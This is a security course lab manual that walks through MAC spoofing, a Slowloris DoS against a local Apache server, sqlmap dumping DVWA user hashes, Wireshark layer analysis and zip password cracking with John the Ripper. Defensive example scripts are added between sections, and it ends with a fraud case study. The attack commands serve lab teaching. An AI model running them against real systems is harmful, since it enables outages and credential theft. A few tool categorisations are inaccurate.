1. IP Spoofing:
IP spoofing is the creation of Internet Protocol (IP) packets which have a modified
source address in order to either hide the identity of the sender, to impersonate another
computer system, or both. It is a technique often used by bad actors to invoke DDoS
attacks against a target device or the surrounding infrastructure.

Sending and receiving IP packets is a primary way in which networked computer and
other devices communicate and constitutes the basis of the modern internet. All IP packets
contain a header which precedes the body of the packet and contains important routing
information, including the source address. In a normal packet, the source IP address is the
address of the sender of the packet. If the packet has been spoofed, the source address will be
forged.

Macchanger:

A Media Access Control (MAC) address is a unique number that gets assigned to every
network interface, including Ethernet and wireless. It's used by many system programs and
protocols in order to identify a network interface. One of the most common examples would
be in the case of DHCP, where a router assigns an IP address to a network interface
automatically. The router will know which device it has assigned an IP address to by referring
to the MAC address.

Unlike an IP address, which is temporary and can be changed easily, MAC addresses
are hardcoded into a network interface from the manufacturer. However, it's still possible to
change or "spoof" a MAC address temporarily. On Linux systems, one of the easiest ways to
do this is with the macchanger command line program. There are both legitimate and shady
reasons why a Linux user may find the need to change a MAC address.

In this guide, we'll show how to install the macchanger program on major Linux
distros and then use the macchanger command to change the MAC address of a network
interface either to a random value or some specific number.

Example:

Before we start using the macchanger command, you'll need to know the name of the network
interface that you want to work with. You can execute the ip a command to see a list of all the
available network interfaces on your system. In most cases this will include a wired, wireless,
and loopback interface.

The name of the network interface is eth0 and the MAC address of the system is 08:00:27:0e:34:8d.

Step:-1 Use the -r option to get a random MAC address.

sudo macchanger -r <network interface>

Step:-2 To verify the change, run the ip a command.
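Added example, not from the manual: once a MAC address can be changed this easily, a defender wants to tell whether an interface's address is still its vendor-assigned one. The script below checks the IEEE 802 locally-administered bit (bit 1 of the first octet, clear on addresses assigned from a vendor OUI block) and compares the address an interface reports in ip a output against a recorded baseline. The ip a output and the replacement address are constructed for the example (they are not the output of the macchanger step above), and the function names are this example's own.

```sh
#!/bin/sh
# Added example, not part of the lab manual: two checks a defender can run
# after a MAC change. The "locally administered" bit (bit 1 of the first
# octet, IEEE 802) is clear on vendor-assigned addresses, and an interface's
# current address can be compared with a recorded baseline. The ip(8) output
# and the changed address below are constructed for the example.

# mac_admin_bit MAC -> "universal" (vendor-assigned OUI) or "local" (U/L bit set)
mac_admin_bit() {
    mac=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case $mac in
        [0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]) ;;
        *) echo "mac_admin_bit: not a MAC address: $1" >&2; return 1 ;;
    esac
    first=$((0x${mac%%:*}))
    if [ $((first & 2)) -ne 0 ]; then echo local; else echo universal; fi
}

# mac_of IFACE < ip-a-output -> the link/ether address of that interface
mac_of() {
    awk -v want="$1" '
        /^[0-9]+: / { cur = $2; sub(/:$/, "", cur); sub(/@.*/, "", cur) }
        $1 == "link/ether" && cur == want { print $2; exit }'
}

# audit_mac IFACE BASELINE < ip-a-output -> "unchanged" or
# "CHANGED old->new (local|universal)"
audit_mac() {
    now=$(mac_of "$1" | tr 'A-F' 'a-f')
    base=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if [ -z "$now" ]; then echo "no such interface: $1"; return 1; fi
    if [ "$now" = "$base" ]; then
        echo unchanged
    else
        echo "CHANGED $base->$now ($(mac_admin_bit "$now"))"
    fi
}

# Constructed ip a output for a host whose eth0 address has been replaced
SAMPLE_IP_A='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 6a:3f:91:c2:5d:10 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic eth0'

demo() {
    # 08:00:27 is the OUI VirtualBox uses for its virtual adapters
    echo "baseline 08:00:27:0e:34:8d is $(mac_admin_bit 08:00:27:0e:34:8d)"
    printf '%s\n' "$SAMPLE_IP_A" | audit_mac eth0 08:00:27:0e:34:8d
}
demo
```

On a real host the same check runs as ip a | audit_mac eth0 <baseline>; recording the baseline from the vendor's label or the hypervisor's configuration, rather than from the interface itself, is what makes the comparison meaningful.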

2. DoS attack:

DoS (Denial of Service) is an attack performed on a computer or a network that reduces,
restricts or prevents accessibility of system resources to legitimate users. In simple terms,
the attacker floods the victim system with malicious traffic to overload its resources. A DoS
attack can do temporary or permanent damage to a website. It can also slow down network
performance.

Tools for DoS/DDoS attack:

1. Slowloris
2. LOIC (Low Orbit Ion Cannon)
3. HOIC (High Orbit Ion Cannon)
4. Pyloris

Slowloris:
Slowloris is a free and open source tool available on GitHub. We can perform a denial
of service attack using this tool. It's a framework written in Python. This tool allows a single
machine to take down another machine's web server using perfectly legitimate HTTP traffic.
It makes a full TCP connection and then requires only a few hundred requests at long-term and
regular intervals. As a result, the tool doesn't need to spend a lot of traffic to exhaust the
available connections on a server.

Use of Slowloris:
- Slowloris sends multiple requests to the target and, as a result, generates heavy traffic like a botnet.
- Slowloris can be used to perform DDoS attacks on any web server.
- It is an open-source tool, so you can download it from GitHub free of cost.
- It uses perfectly legitimate HTTP traffic.
- A denial of service attack can be executed with the help of Slowloris by generating heavy
traffic as a botnet would.

Installation and step-by-step implementation of the Slowloris tool:

Step 1: Open your Kali Linux machine and then open a terminal.
Step 2: Create a new directory on the Desktop named Slowloris using the following command.
mkdir Slowloris
Step 3: Move into the directory that you have just created (Slowloris).
cd Slowloris

Step 4: Now you have to clone the Slowloris tool from GitHub so that you can install it on
your Kali Linux machine. For that, you only have to type the following command in your terminal
within the Slowloris directory that you have created.
git clone https://github.com/gkbrk/slowloris.git

Step 5: Now go to the Action bar and click on "split terminal vertically"; you will see that
a second terminal pane has been opened.
Step 6: Now you have to check the IP address of your machine. To do that, type the following
command.

ifconfig

Step 7: As you can see, we got our IP address. Now it's time to start the Apache server; to start
the Apache server use the following command.

sudo service apache2 start

Step 8: Now we have to check the status of the server, whether it is active or not. To check
the status of the server run the following command.

service apache2 status

Step 9: We can see that our server is in active status, which means it is running properly. Now
come back to the first terminal and check the file permissions with the following command.

ls -l
Step 10: Now it's time to run the tool using the following command.
python3 slowloris.py <your ip address> -s 500
Step 11: You can see the tool has started attacking the IP address we gave it. To check whether it
is working or not, go to your browser and type that IP address in the URL bar; you will see the
site keeps loading but never opens. This is how the Slowloris tool works.
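The practical above shows the attack from the attacker's terminal; as an added example that is not part of the original document, the Python below shows what the same attack looks like from the server side. It parses a socket table in the shape of ss -tn state established output (the rows are constructed, not captured) and flags any peer holding an unusually large number of concurrent connections to port 80, which is the signature of a Slowloris-style client. The threshold of 10 is an assumed value that a real deployment would tune.

```python
from collections import Counter

HEADER = "Recv-Q Send-Q Local Address:Port   Peer Address:Port"
# Constructed rows in the shape of `ss -tn state established` output (not a real capture):
# one client holding 12 sockets open to port 80, a normal client with 2, and an SSH session.
ROWS = [f"0      0      192.168.56.101:80   192.168.56.1:{51200 + i}" for i in range(12)]
ROWS += [f"0      0      192.168.56.101:80   10.0.0.5:{40000 + i}" for i in range(2)]
ROWS += ["0      0      192.168.56.101:22   10.0.0.5:40100"]  # not web traffic, must be ignored
SAMPLE_SS = "\n".join([HEADER, *ROWS]) + "\n"


def split_endpoint(endpoint):
    """'192.168.56.1:51200' -> ('192.168.56.1', 51200); also handles '[::1]:80'."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def count_peers(text, local_port=80):
    """Count established connections per peer IP to the given local port."""
    counts = Counter()
    for line in text.splitlines()[1:]:  # skip the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        _, lport = split_endpoint(fields[2])
        peer, _ = split_endpoint(fields[3])
        if lport == local_port:
            counts[peer] += 1
    return counts


def flag_slow_clients(counts, threshold=10):
    """Peers holding more than `threshold` concurrent sockets, highest count first."""
    return sorted(((ip, n) for ip, n in counts.items() if n > threshold),
                  key=lambda item: -item[1])


if __name__ == "__main__":
    for ip, n in flag_slow_clients(count_peers(SAMPLE_SS)):
        print(f"{ip} holds {n} open connections to :80 - investigate")
```

On a real host the text would come from ss or netstat. Detection is only half the job: Apache's mod_reqtimeout module (for example RequestReadTimeout header=20-40,MinRate=500) closes connections whose request headers arrive too slowly, which removes the condition Slowloris relies on.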

Sign: _______ _ _ __

Practical: - 6
Examine SQL injection attack, Perform SQL injection with
Sqlmap on vulnerable website found using DVWA.

SQL injection Attack:

SQL injection is a web security vulnerability that allows an attacker to interfere with
the queries that an application makes to its database. It generally allows an attacker to view
data that they are not normally able to retrieve. This might include data belonging to other
users, or any other data that the application itself is able to access. In many cases, an attacker
can modify or delete this data, causing persistent changes to the application's content or
behaviour.
In some situations, an attacker can escalate an SQL injection attack to compromise
the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
A successful SQL injection attack can result in unauthorized access to sensitive data,
such as passwords, credit card details, or personal user information. Many high-profile data
breaches in recent years have been the result of SQL injection attacks, leading to reputational
damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into
an organization's systems, leading to a long-term compromise that can go unnoticed for an
extended period.

SQL injection with DVWA:

Start your DVWA VM and the Kali Linux box. To find the cookie value and to monitor sqlmap
activity it's best to use a proxy. Open OWASP ZAP (you can also try using Burp Suite) and
click the Firefox button:

Navigate to the DVWA web page and add the current domain to scope by clicking the top left
button of the ZAP HUD:

Log in, set the security level to 'low' and go to SQL Injection (Blind). Search for the ID '1'. The
parameters we'll need for sqlmap are displayed in ZAP, so go and take a look.

Create a command with right parameters:

$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8080 --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low"

We've discovered the DBMS is MySQL 5.0.12, the OS is Ubuntu and the web server is Apache
2.4.29. Let's list the databases available using the "--dbs" parameter:
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8080 --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" --dbs

Now, find the tables with '-D dvwa --tables':
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8080 --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D dvwa --tables

Now we'll take a look at the columns with '-D dvwa -T users --columns':
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8080 --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D dvwa -T users --columns

And now we'll get the dump:
$ sqlmap -u "http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8080 --cookie="PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low" -D dvwa -T users --dump

We have obtained the users table and the password hashes. At the end sqlmap will suggest the
use of a dictionary on the hashes; that step is optional.
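To see why the DVWA page is injectable at all, here is an added example (not part of the original practical and not DVWA's own code) in Python with sqlite3: a constructed users table, a lookup written the way the DVWA 'low' page concatenates the id parameter into the query, and the parameterised version beside it. is_injectable applies the same true/false probe that sqlmap's boolean-based blind technique automates and reports whether the two probes produce different results; only the concatenated version does.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the DVWA users table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])
    return conn


def lookup_vulnerable(conn, user_id):
    """The DVWA-style pattern: the request parameter is pasted into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised form: the driver sends the value separately, so it is only ever data."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def is_injectable(conn, lookup, base_id="1"):
    """Boolean-based blind probe: an injectable lookup answers the two probes differently.

    The true probe keeps the original WHERE clause true, the false probe makes it false;
    a parameterised query treats both strings as a literal id and returns nothing for either.
    """
    true_probe = lookup(conn, f"{base_id}' AND '1'='1")
    false_probe = lookup(conn, f"{base_id}' AND '1'='2")
    return true_probe != false_probe


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_vulnerable), ("parameterised", lookup_safe)):
        print(f"{name:14s} id=1 -> {fn(db, '1')}  injectable={is_injectable(db, fn)}")
```

Note that the fix is not escaping or filtering the id: binding the value as a parameter means the database never parses user input as SQL, which is also what sets DVWA's 'impossible' level apart from 'low'.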

Practical: - 7
Use Wireshark tool and explore the packet format and content
at each OSI Layer

Wireshark:
Wireshark is an open-source network protocol analysis software program started
by Gerald Combs in 1998. A global organization of network specialists and software
developers support Wireshark and continue to make updates for new network technologies and
encryption methods.
Wireshark is absolutely safe to use. Government agencies, corporations, non-profits,
and educational institutions use Wireshark for troubleshooting and teaching purposes. There
isn't a better way to learn networking than to look at the traffic under the Wireshark
microscope.
There are questions about the legality of Wireshark since it is a powerful packet
sniffer. The Light side of the Force says that you should only use Wireshark on networks where
you have permission to inspect network packets. Using Wireshark to look at packets without
permission is a path to the Dark Side.

OSI Layers Analysis by Wireshark:
Using a few protocols as examples, we can understand the layers through
Wireshark. The interesting part is that not every protocol carries all of the layers.
Because Wireshark decodes packets starting at the data link layer, we will not always get
physical layer information. In some cases the capturing adapter provides some physical layer
information, and that can be displayed through Wireshark.
So here is the sequence of layers seen in Wireshark:
1. Data link layer
2. Network layer
3. Transport layer
4. Application layer
Wireshark shows the layers bottom-up, the reverse of the OSI model's top-down numbering; if
physical layer information is given to Wireshark, it appears above the data link layer.

1. HTTP:
HTTP means Hypertext Transfer Protocol. An HTTP packet has 4 layers. OCSP (Online Certificate
Status Protocol) is carried over Hypertext Transfer Protocol (HTTP) and is used for obtaining the
revocation status of an X.509 digital certificate.

2. TCP:
TCP means Transmission Control Protocol. A TCP packet has 3 layers.

3. ICMP:
ICMP means Internet Control Message Protocol. An ICMP packet has 2 layers.
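As an added example that is not part of the original practical, the Python below decodes a frame by hand in the same order Wireshark's packet details pane shows it. The frames are constructed with struct (the addresses reuse the eth0 MAC and the lab IP addresses from the earlier practicals; IP and TCP checksums are left at zero because nothing here validates them), and decode_frame returns one dictionary entry per layer, so the HTTP, TCP-only and ICMP frames come back with the 4, 3 and 2 layers the text describes.

```python
import socket
import struct


def fmt_mac(raw):
    """6 raw bytes -> 'aa:bb:cc:dd:ee:ff'."""
    return ":".join(f"{b:02x}" for b in raw)


def build_sample_frame(kind):
    """Constructed Ethernet/IPv4 frames for demonstration; checksums are left at zero."""
    eth = struct.pack("!6s6sH", bytes.fromhex("080027aabbcc"), bytes.fromhex("0800270e348d"), 0x0800)
    src, dst = socket.inet_aton("192.168.56.1"), socket.inet_aton("192.168.56.101")
    if kind == "icmp":
        proto, segment = 1, struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1)  # echo request
    else:
        payload = b"GET / HTTP/1.1\r\nHost: 192.168.56.101\r\n\r\n" if kind == "http" else b""
        flags = 0x18 if kind == "http" else 0x10  # PSH+ACK carrying data, or a bare ACK
        proto = 6
        # sport, dport, seq, ack, data offset (5 words), flags, window, checksum, urgent
        segment = struct.pack("!HHIIBBHHH", 51212, 80, 1, 1, 5 << 4, flags, 65535, 0, 0) + payload
    total_len = 20 + len(segment)
    # version/IHL, TOS, total length, id, flags/frag, TTL, protocol, checksum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0, 64, proto, 0, src, dst)
    return eth + ip + segment


def decode_frame(data):
    """Peel the frame layer by layer; one dict key per layer, in Wireshark's display order."""
    layers = {}
    dst, src, ethertype = struct.unpack("!6s6sH", data[:14])
    layers["data_link"] = {"dst": fmt_mac(dst), "src": fmt_mac(src), "type": hex(ethertype)}
    if ethertype != 0x0800:  # only IPv4 is decoded here
        return layers
    vihl, _tos, total_len, _id, _frag, ttl, proto, _csum, s, d = struct.unpack("!BBHHHBBH4s4s", data[14:34])
    ihl = (vihl & 0x0F) * 4
    layers["network"] = {"src": socket.inet_ntoa(s), "dst": socket.inet_ntoa(d), "ttl": ttl, "protocol": proto}
    rest = data[14 + ihl:14 + total_len]
    if proto == 1:  # ICMP lives inside the network layer, so no transport entry
        icmp_type, code = struct.unpack("!BB", rest[:2])
        layers["network"]["icmp"] = {"type": icmp_type, "code": code}
        return layers
    if proto == 6:
        sport, dport, _seq, _ack, off, flags, _win, _csum, _urg = struct.unpack("!HHIIBBHHH", rest[:20])
        data_offset = (off >> 4) * 4
        layers["transport"] = {"sport": sport, "dport": dport, "flags": hex(flags)}
        payload = rest[data_offset:]
        if payload:  # an empty segment (pure ACK) has no application layer
            layers["application"] = payload.decode("ascii", "replace")
    return layers


if __name__ == "__main__":
    for kind in ("http", "tcp_ack", "icmp"):
        decoded = decode_frame(build_sample_frame(kind))
        print(f"{kind:8s} {len(decoded)} layers: {list(decoded)}")
```

The IHL and TCP data-offset fields are read rather than assumed so that frames with IP or TCP options would still decode; that is the same bookkeeping Wireshark does before it can label the next layer.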

Practical: - 8
Perform online attacks and offline attacks of Password
cracking

1. Online Password Cracking Attacks:

Online password cracking is attacking a computer system through an interface that it
presents to its legitimate users by attempting to guess the login credentials. For instance, an
attacker can try to guess a user's credentials for a web application login page; for an SSH or
Telnet server; or for a network service such as Lightweight Directory Access Protocol (LDAP),
one of the mail protocols (SMTP, POP3, or IMAP), FTP, or one of many others.
There are many pre-installed tools for online password cracking in Kali Linux, such as:
1. THC-Hydra
2. John the Ripper
3. Aircrack-ng
4. Cain & Abel
5. Wfuzz

John the Ripper:

First released in 1996, John the Ripper (JtR) is a password cracking tool originally
produced for UNIX-based systems. It was designed to test password strength, brute-force
encrypted (hashed) passwords, and crack passwords via dictionary attacks.
Some of the key features of the tool include offering multiple modes to speed up
password cracking, automatically detecting the hashing algorithm used by the encrypted
passwords, and the ease of running and configuring the tool making it a password cracking
tool of choice for novices and professionals alike.

Example:
Crack the password of a locked zip file using John the Ripper.

Step 1:
Convert the zip file into a hash file.

Command: zip2john <Zip file name>

Step 2:
Save the hash of the zip file in a hash file.

Command: zip2john <Zip file name> > <hash file name>

Note: The extension of the hash file is .hashes

Step 3:
Now run John the Ripper directly on the hash file.

Command: john <hash file name>

Step 4:
Once the password has been cracked, you can see it with the --show option.
Command: john <hash file name> --show

2. Offline Password Cracking Attacks:
Offline Password Cracking is an attempt to recover one or more passwords from a
password storage file that has been recovered from a target system. Typically, this would be
the Security Account Manager (SAM) file on Windows, or the /etc/shadow file on Linux. In
most cases, Offline Password Cracking will require that an attacker has already attained
administrator/root level privileges on the system to get to the storage mechanism. It is possible,
however, that the password hashes could also have been pulled directly from a database using
SQL injection, an unprotected flat text file on a web server, or some other poorly protected
source.
The main offline password cracking methods are:
1. Dictionary Attacks
2. Brute-Force Attacks
3. Rainbow Attacks

Brute-Force Attacks:
In this type of attack, the hacker tries to determine the password by trying every possible
combination of characters. The number of attempts is bounded by the number of characters
tried per position and the maximum length (or by the number of bytes per position if we are
considering Unicode passwords too).

The time taken to complete is relatively long, but there is a greater chance of covering
the likely clear text value (all possibilities are covered only if the maximum length is set and every
possible character is considered in every position). It is like a combination lock which requires three
numbers to be entered in sequence; one tries every possible combination, e.g. first 1-2-3, then
1-2-4.

A brute force attack may not try all options in sequential order. An advanced brute force
attack can make certain assumptions, e.g. that complexity rules require an uppercase letter and
that the first character is more likely to be upper case than lower case.
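As an added example that is not part of the original practical, the Python below puts numbers on the combination-lock argument: keyspace counts the candidates a brute-force attack must try, and the PBKDF2 functions show the defender's lever, a salted and deliberately slow hash, so that the same keyspace costs far more per guess than a plain SHA-1 does. The storage format 'pbkdf2$iterations$salt$digest' is a constructed convention for this example, not a standard one, and the guess rates printed by main are whatever the machine running it manages.

```python
import hashlib
import secrets
import time


def keyspace(charset_size, max_len):
    """Number of candidates of length 1..max_len: the most a brute-force attack must try."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


def seconds_to_exhaust(charset_size, max_len, guesses_per_second):
    """Worst-case time to try the whole keyspace at a given guess rate."""
    return keyspace(charset_size, max_len) / guesses_per_second


def hash_password(password, iterations=600_000, salt=None):
    """Salted PBKDF2-HMAC-SHA256; 'pbkdf2$iter$salt$digest' is a constructed storage format."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return secrets.compare_digest(digest.hex(), digest_hex)


def measure_rate(hash_fn, trials=5):
    """Rough single-core guesses per second for a hash function (timing is machine-dependent)."""
    t0 = time.perf_counter()
    for _ in range(trials):
        hash_fn("sample-candidate")  # a fixed dummy candidate, not a real credential
    return trials / (time.perf_counter() - t0)


if __name__ == "__main__":
    fast = measure_rate(lambda p: hashlib.sha1(p.encode()).digest(), trials=2000)
    slow = measure_rate(lambda p: hash_password(p, iterations=100_000), trials=5)
    for name, rate in (("SHA-1", fast), ("PBKDF2 100k", slow)):
        years = seconds_to_exhaust(95, 8, rate) / (365 * 24 * 3600)
        print(f"{name:12s} {rate:12.0f} guesses/s -> 8-char printable ASCII exhausted in {years:.1e} years")
```

Two things the numbers make visible: the keyspace grows geometrically with length, so each extra character costs the attacker more than any complexity rule does, and a per-user salt means a rainbow table built once cannot be reused, which is why zip2john-style offline cracking is so much cheaper against unsalted or fast hashes.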

Case Study

Online credit-card fraud:

First credit-card fraud in India

PANCHKULA: A Panchkula woman was duped of Rs 1 lakh when she requested online closure
of her credit card. Police have registered a case in this regard.

A complaint was given to the police by Roopsi Sehgal, a resident of Sector 6. In her complaint
to the police, she stated that she used a credit card of SBI Bank and received a phone call from
an unknown person, who claimed to be a representative of the bank and called to take her
queries related to the credit card. The victim told him that she wanted to get her credit card
closed and the caller sent her an online link and asked her to fill in all her personal details. When
the victim opened the link and entered her bank and credit card details in it, she received an OTP,
and when she shared that OTP in the link, a transaction of Rs 99,666 took place from her credit
card.

List of Laws against online credit-card fraud:

1. Section 66C IT Act, 2000

Section 66C says "Whoever tries to make use of any electronic password fraudulently
or dishonestly shall be punished with imprisonment up to three years and a fine up to one lakh
rupees."

2. Section 66D IT Act, 2000

Section 66D says "Whoever by any device tries to do cheating by personation shall
be punished with imprisonment up to three years and a fine up to one lakh rupees."

3. Section 468 of IPC

Section 468 says "Whoever commits forgery for the purpose of cheating shall be
punished with imprisonment up to seven years and shall also be liable to fine."

4. Section 471 of IPC

Section 471 says "Whoever fraudulently or dishonestly uses a document which he
knows to be false shall be punished with the same punishment as if he had forged such
document."

5. Section 420 of IPC
Cheating and dishonestly inducing delivery of property.—Whoever cheats and
thereby dishonestly induces the person deceived to deliver any property to any person, or to
make, alter or destroy the whole or any part of a valuable security, or anything which is signed
or sealed, and which is capable of being converted into a valuable security, shall be punished
with imprisonment of either description for a term which may extend to seven years, and shall
also be liable to fine.

Note:
If anyone's credit card has been lost/stolen and someone makes any transactions with it, he will
be liable under these sections. The victim has to file an FIR at the nearby police station. The
evidence, in this case, would be the account statement. The rest of the evidence, such as the IP address
of the fraudster, will be collected by the police in its investigation. The bank has the log details
of the credit card transactions, which help the police in its investigation. Based on the log details
(IP address), it can trace the criminals.
